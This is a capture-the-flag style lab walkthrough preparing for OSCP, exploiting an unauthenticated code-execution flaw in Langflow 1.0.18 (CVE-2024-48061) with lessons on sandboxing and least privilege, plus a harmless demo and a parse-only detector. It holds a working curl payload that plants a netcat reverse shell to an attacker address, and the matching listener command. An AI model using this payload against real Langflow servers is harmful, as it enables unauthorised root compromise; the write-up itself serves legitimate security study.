Preparing for OSCP | Sharing Practical Labs & Real-World Attack Analysis

Step 1: Reconnaissance

Nmap Scan

nmap -sCV -A --min-rate 1000 192.168.224.117 -p-

Two ports were found:

• 22/tcp - OpenSSH 9.6p1 Ubuntu

• 7860/tcp - Uvicorn HTTP server running Langflow AI workflow builder

Web Browser

Version Identification

curl -s http://192.168.224.117:7860/api/v1/version

Version 1.0.18 is confirmed, and it is vulnerable to CVE-2024-48061. All versions <= 1.0.18 are affected.

Step 2: Vulnerability Analysis - CVE-2024-48061

About the Vulnerability

CVE-2024-48061 is a critical (CVSS 9.8) unauthenticated remote code execution vulnerability in Langflow <= 1.0.18. The /api/v1/validate/code endpoint accepts Python code and validates it using exec() without any sandboxing, so any code submitted runs directly on the server in the local environment.

Vulnerable Code Path

Exploitation Technique - Function Default Parameter

Python evaluates function default parameters immediately when the function is defined, not when it is called. Because our malicious code is embedded as a default parameter value, exec() runs it the moment it processes the function definition.
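
The definition-time behaviour described above, shown with a harmless constructed sample, next to a parse-only check that flags the pattern without executing anything. This is an added example, not code from the original write-up or from Langflow; `record`, `SAMPLE` and both function names are assumptions made for the illustration. The check covers only defaults, decorators and class headers, so it is a detection aid and not a sandbox.

```python
import ast

# Constructed, harmless sample: the default value calls record(), a
# hypothetical helper that only notes that it ran.
SAMPLE = "def f(x=record('default evaluated')):\n    pass\n"


def defaults_run_at_definition(source: str) -> list:
    """Exec the definition without ever calling f; return what record() saw."""
    seen = []
    exec(source, {"record": seen.append})
    return seen


def definition_time_calls(source: str) -> list:
    """Parse only, never execute. Report calls that would run as soon as a
    def or class statement is processed: defaults, decorators, class headers."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            a = node.args
            exprs = a.defaults + [d for d in a.kw_defaults if d is not None]
            exprs += node.decorator_list
        elif isinstance(node, ast.ClassDef):
            exprs = node.decorator_list + node.bases
            exprs += [k.value for k in node.keywords]
        else:
            continue
        for expr in exprs:
            for sub in ast.walk(expr):
                if isinstance(sub, ast.Call):
                    findings.append((node.name, sub.lineno, ast.unparse(sub)))
    return findings


if __name__ == "__main__":
    print(defaults_run_at_definition(SAMPLE))   # side effect without a call to f
    for name, line, call in definition_time_calls(SAMPLE):
        print(f"{name}:{line}: runs at definition time: {call}")
```

Syntax validation that stops at `ast.parse` never evaluates the default; handing the same definition to exec() does.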

Step 3: Exploitation

Step 3.1 - Start Netcat Listener

nc -lvnp 4444

Step 3.2 - Send Exploit Payload

curl -s -X POST "http://192.168.224.117:7860/api/v1/validate/code" \
  -H "Content-Type: application/json" \
  -d '{"code": "def exploit(x=__import__(\"os\").system(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.186 4444 >/tmp/f\")):\n pass"}'

Step 3.3 - Shell Received

Langflow was running as root. The function default parameter trick triggered our reverse shell the moment exec() processed the function definition, giving us immediate root access.

Step 4: Capture Flag

cat /root/proof.txt

Key Learnings

• CVE-2024-48061: Langflow's /api/v1/validate/code endpoint passes user-supplied Python code directly to exec() without any sandboxing. This allows any unauthenticated attacker to execute arbitrary code on the server.

• Default Parameter Trick: Python evaluates function default parameters immediately at function definition time, not at call time. Embedding os.system() as a default parameter triggers execution the moment exec() processes the function definition.

• __import__() Bypass: __import__('os') is Python's built-in import function that works even in restricted exec() contexts where the import statement may be blocked.

• Root Process: Langflow was running as root, turning a code injection vulnerability into complete system compromise. Services should always run with least privilege.

• No Authentication: The /api/v1/validate/code endpoint required no authentication, making it exploitable by any attacker who can reach the service. AI/ML frameworks should always enforce authentication on code execution endpoints.